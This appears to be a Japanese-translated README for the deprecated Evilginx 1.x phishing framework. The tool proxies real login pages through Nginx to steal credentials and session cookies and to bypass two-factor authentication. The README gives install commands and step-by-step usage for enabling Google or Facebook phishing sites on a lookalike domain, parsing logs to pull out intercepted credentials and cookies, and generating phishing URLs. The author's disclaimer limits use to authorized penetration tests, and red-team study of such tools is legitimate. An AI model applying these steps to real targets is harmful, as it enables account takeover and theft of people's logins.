
新しいバージョンを使用してください: https://github.com/kgretzky/evilginx2

このバージョンは廃止されました。最新バージョンを使用してください!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginxは、あらゆるウェブサービスの認証情報やセッションCookieをフィッシングするために使用される中間者攻撃フレームワークです。そのコアはNginx HTTPサーバー上で動作し、proxy_passとsub_filterを利用してHTTPコンテンツをプロキシし変更しながら、クライアントとサーバー間のトラフィックを傍受します。
仕組みやインストール方法については、私のブログで学べます:
最初の記事はやや古くなっています:Evilginx - Advanced Phishing With Two-factor Authentication Bypass
Evilginx 1.0 アップデート - 2FAフィッシングでスキルアップ: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
Evilginx 1.1 アップデート: Evilginx 1.1 Update
Evilginxは非常に悪質な目的に使用される可能性があることを認識しています。この作品は、熟練した攻撃者が何ができるかを示す単なるデモンストレーションです。防御側は、防御を構築する際にこのような攻撃を考慮し、このフィッシング手法から保護する方法を見つける責任があります。 Evilginxは、フィッシングされる側からの書面による許可を得た、正当なペネトレーションテストの任務でのみ使用されるべきです。
Evilginxには、Debian wheezy/jessieマシンにパッケージ全体を簡単にインストールするためのインストールスクリプトinstall.shが用意されています。
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Evilginxを設定します。
parse ログファイルを解析します。
genurl フィッシングURLを生成します。
optional arguments:
-h, --help このヘルプメッセージを表示して終了します
Nginxサーバーで使用するサイト設定を、sitesディレクトリにあるEvilginxテンプレートを使用して有効化または無効化します。
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help このヘルプメッセージを表示して終了します
-d DOMAIN, --domain DOMAIN
あなたのフィッシングドメイン。
-y すべての質問に'Yes'で答える。
-l, --list 利用可能なサポートアプリを一覧表示する。
--enable ENABLE 指定した名前のサイトを有効化する。
--disable DISABLE 指定した名前のサイトを無効化する。
利用可能なサイト設定テンプレートを一覧表示:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
事前に登録したフィッシングドメインnot-really-google.comでgoogleフィッシングサイトを有効化する:
python evilginx.py setup --enable google -d not-really-google.com
facebookフィッシングサイトを無効化する:
python evilginx.py setup --disable facebook
Nginxログを解析して、傍受したログイン認証情報とセッションCookieを抽出します。ログはデフォルトでは、evilginx.pyスクリプトがあるlogsディレクトリに保存されます。
これは、セットアップフェーズで自動解析を有効にすると自動的に行えます。
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help このヘルプメッセージを表示して終了します
-s SITE, --site SITE ログを解析するサイトの名前('all'ですべてのサイトのログを解析)。
--debug 解析後にログファイルを切り詰めない。
googleサイトのみログを解析:
python evilginx.py parse -s google
利用可能なすべてのサイトのログを解析:
python evilginx.py parse -s all
レッドチームアセスメントで使用できるフィッシングURLを生成します。
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help このヘルプメッセージを表示して終了します
-s SITE, --site SITE リンクを生成するサイトの名前。
-r REDIRECT, --redirect REDIRECT
サインイン成功後にユーザーをこのURLにリダイレクトします。
ログイン成功時に被害者をリックロール動画にリダイレクトするgoogleフィッシングURLを生成:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ